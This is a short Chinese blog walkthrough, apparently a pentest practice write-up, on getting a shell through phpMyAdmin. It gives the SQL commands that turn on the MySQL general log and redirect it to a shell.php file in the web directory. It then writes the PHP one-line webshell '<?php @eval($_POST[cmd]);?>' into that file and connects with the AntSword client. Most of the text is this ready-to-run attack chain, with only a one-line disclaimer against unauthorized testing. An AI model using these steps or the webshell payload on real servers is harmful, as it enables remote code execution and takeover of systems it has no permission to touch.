PhPMyadmin-漏洞复现

前情条件是:首先将我们的PHP版本设置在5.5以上 注:禁止用于未授权的测试!

首先搭建环境,登录后台

点击》》SQL

查看当前的日志状态

复制代码
  SHOW VARIABLES LIKE 'general%';

因为之前我原来做过所以general_log 是开启的,如果vlau 是OFF时,可以使用

set global general_log = "ON";打开日志

然后后面打开genera_log_file 写到网站目录下

复制代码
  set global general_log_file='D:\\phpstudy_pro\\WWW\\pikachu-master\\shell.php'
前提是知道网站目录下

查看日志,​​看更改日志文件路径是否成功

日志文件里写入一句话木马

复制代码
  select '<?php @eval($_POST[cmd]);?>';

访问一下shell.php

复制代码
  http://pikachu-master/shell.php

能够成功访问

然后适用蚁剑连接

成功连接

相关推荐
独行soc26 分钟前
2025年渗透测试面试题总结-某步在线面试(题目+回答)
linux·网络·安全·web安全·面试·职场和发展·渗透安全
hie988942 小时前
如何配置 Java 安全管理器来避免访问控制异常
java·python·安全
芯盾时代2 小时前
RSAC 2025观察:零信任+AI=网络安全新范式
人工智能·安全·web安全·网络安全
☞无能盖世♛逞何英雄☜2 小时前
文件包含漏洞
安全·web安全
Ftrans2 小时前
【分享】解锁文件摆渡系统新玩法:虚拟目录助力企业效率提升
大数据·安全
Yungoal3 小时前
Wireshark抓账号密码
网络协议·安全·ssl
Star abuse5 小时前
网络安全赛题解析
安全·web安全
海尔辛5 小时前
学习黑客网络安全法
网络·学习·web安全
亚远景aspice5 小时前
亚远景-ASPICE vs ISO 21434:汽车软件开发标准的深度对比
网络·安全
创客匠人老蒋5 小时前
雷军「去执行化」与小米汽车更名:一场关乎安全与战略的双向奔赴|创客匠人热点评述
安全·汽车